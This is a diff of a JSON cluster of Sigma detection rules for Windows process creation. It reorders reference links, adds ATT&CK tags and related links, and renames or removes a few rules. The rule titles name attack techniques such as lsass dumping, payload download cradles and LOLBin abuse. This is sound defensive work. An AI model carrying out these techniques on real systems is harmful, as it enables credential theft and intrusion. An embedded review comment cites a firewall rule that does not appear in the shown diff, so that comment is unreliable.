@@ -57020,13 +57898,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Wietze/status/1542107456507203586", - "https://twitter.com/Hexacorn/status/1224848930795552769", - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", + "https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py", "https://twitter.com/SBousseaden/status/1167417096374050817", + "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://twitter.com/Wietze/status/1542107456507203586", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml" ], "tags": [ @@ -57137,11 +58015,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", "https://twitter.com/christophetd/status/1164506034720952320", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml" ], "tags": [ 
@@ -57242,12 +58120,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml" ], "tags": [ 
@@ -57362,12 +58240,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/eral4m/status/1479106975967240209", - "https://twitter.com/eral4m/status/1479080793003671557", - "https://twitter.com/Hexacorn/status/885258886428725250", - "https://twitter.com/nas_bench/status/1433344116071583746", - "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/eral4m/status/1479080793003671557", + "https://twitter.com/nas_bench/status/1433344116071583746", + "https://twitter.com/Hexacorn/status/885258886428725250", + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/eral4m/status/1479106975967240209", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml" ], "tags": [ @@ -57400,8 +58278,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2288", "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://adsecurity.org/?p=2288", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" ], "tags": [ @@ -57434,8 +58312,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" ], "tags": [ 
@@ -57469,8 +58347,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" ], "tags": [ @@ -57528,8 +58406,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1451237393017839616", "https://github.com/Tylous/ZipExec", + "https://twitter.com/SBousseaden/status/1451237393017839616", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml" ], "tags": [ @@ -57571,8 +58449,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester.yml" ], "tags": [ @@ -57752,8 +58630,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process", - "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", + "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" ], "tags": [ 
@@ -57983,9 +58861,9 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://twitter.com/lefterispan/status/1286259016436514816", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml" ], "tags": [ @@ -58019,10 +58897,10 @@ "logsource.product": "windows", "refs": [ "https://blog.alyac.co.kr/1901", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" ], "tags": [ @@ -58206,8 +59084,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml" ], 
@@ -58264,9 +59142,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/nas_bench/status/1534957360032120833", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", - "https://twitter.com/nas_bench/status/1534957360032120833", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml" ], "tags": [ @@ -58350,8 +59228,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/HiwinCN/HTran", "https://github.com/cw1997/NATBypass", + "https://github.com/HiwinCN/HTran", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml" ], "tags": [ @@ -58385,9 +59263,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.nirsoft.net/utils/nircmd.html", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml" ], "tags": [ @@ -58587,8 +59465,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", + "https://twitter.com/0gtweet/status/1674399582162153472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml" ], "tags": [ 
@@ -58687,8 +59565,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml" ], "tags": [ @@ -58721,9 +59599,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", - "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", + "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", + "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml" ], "tags": [ @@ -58747,8 +59625,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml" ], 
@@ -58866,8 +59744,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mrd0x/status/1478116126005641220",
 "https://lolbas-project.github.io/lolbas/Binaries/Msedge/",
+ "https://twitter.com/mrd0x/status/1478116126005641220",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"
 ],
 "tags": [
@@ -58949,8 +59827,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/",
 "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml"
 ],
 "tags": [
@@ -59067,8 +59945,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/",
- "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
 "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt",
+ "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_usage.yml"
 ],
 "tags": [
@@ -59168,9 +60046,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
 "https://twitter.com/nao_sec/status/1530196847679401984",
 "https://twitter.com/_JohnHammond/status/1531672601067675648",
- "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"
 ],
 "tags": [
@@ -59328,10 +60206,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1211636381086339073",
 "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
- "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
 "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
+ "https://twitter.com/SBousseaden/status/1211636381086339073",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml"
 ],
 "tags": [
@@ -59449,8 +60327,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b",
 "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets",
+ "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml"
 ],
 "tags": [
@@ -59549,12 +60427,12 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
 "https://www.joeware.net/freetools/tools/adfind/",
 "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
 "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
 "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml"
 ],
@@ -59662,8 +60540,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
 "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps",
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml"
 ],
 "tags": [
@@ -59765,8 +60643,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_change.yml"
 ],
 "tags": [
@@ -59800,9 +60678,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
+ "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files",
 "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
 "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks",
- "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml"
 ],
 "tags": [
@@ -59835,8 +60713,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
 "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/",
+ "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml"
 ],
@@ -59874,8 +60752,20 @@
 "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad",
 "value": "Abusing IEExec To Download Payloads"
 },
@@ -59892,8 +60782,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/",
 "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml"
 ],
 "tags": [
@@ -59976,9 +60866,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://twitter.com/MichalKoczwara/status/1553634816016498688",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml"
 ],
 "tags": [
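Review bot: The first hunk on this line turns `meta.tags` from the string sentinel `"No established tags"` into an array, but the sentinel is still emitted for other entries in this file (the firewall cleartext rule at the top of the patch keeps `"tags": "No established tags"`), so the key has two types across the document and a consumer iterating tags has to special-case the string. If the generator that produces this cluster is in the repository, emitting `"tags": []` for rules without tags would keep the field a single type; the same sentinel-to-array switch appears in the later hunks that add `related` blocks. The `related` entry added here follows the existing `related-to` / `almost-certain` convention used elsewhere in the file, so no issue there. The enclosing cluster object starts before this hunk.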
@@ -60049,8 +60939,20 @@
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf",
 "value": "Potential COM Objects Download Cradles Usage - Process Creation"
 },
@@ -60067,8 +60969,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell",
 "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content",
+ "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml"
 ],
 "tags": [
@@ -60160,8 +61062,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core",
 "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
+ "https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml"
 ],
 "tags": [
@@ -60194,10 +61096,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
 "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/",
- "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support",
+ "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
 "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7",
+ "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml"
 ],
 "tags": [
@@ -60256,8 +61158,22 @@
 "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1053.005"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "970823b7-273b-460a-8afc-3a6811998529",
 "value": "Uncommon One Time Only Scheduled Task At 00:00"
 },
@@ -60489,9 +61405,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
 "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16",
 "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/",
+ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml"
 ],
 "tags": [
@@ -60512,20 +61428,20 @@
 "value": "Odbcconf.EXE Suspicious DLL Location"
 },
 {
- "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution",
+ "description": "Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution",
 "meta": {
 "author": "Nasreddine Bencherchali (Nextron Systems)",
 "creation_date": "2023/01/12",
 "falsepositive": [
- "Unknown"
+ "Legitimate packages that make use of external binaries such as Windows Terminal"
 ],
 "filename": "proc_creation_win_susp_appx_execution.yml",
- "level": "high",
+ "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml"
 ],
 "tags": [
@@ -60533,7 +61449,7 @@
 ]
 },
 "uuid": "f91ed517-a6ba-471d-9910-b3b4a398c0f3",
- "value": "Suspicious Windows App Activity"
+ "value": "Potentially Suspicious Windows App Activity"
 },
 {
 "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)",
@@ -60558,40 +61474,6 @@
 "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c",
 "value": "Mshtml DLL RunHTMLApplication Abuse"
 },
- {
- "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.",
- "meta": {
- "author": "Aaron Herman",
- "creation_date": "2022/10/01",
- "falsepositive": [
- "Legitimate scripts located on other partitions such as \"D:\""
- ],
- "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/",
- "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "related": [
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74",
- "value": "Wscript Execution from Non C Drive"
- },
 {
 "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.",
 "meta": {
@@ -60641,8 +61523,29 @@
 "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.t1105"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0f0450f3-8b47-441e-a31b-15a91dc243e2",
 "value": "Potential DLL File Download Via PowerShell Invoke-WebRequest"
 },
@@ -60726,11 +61629,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
- "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
 "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
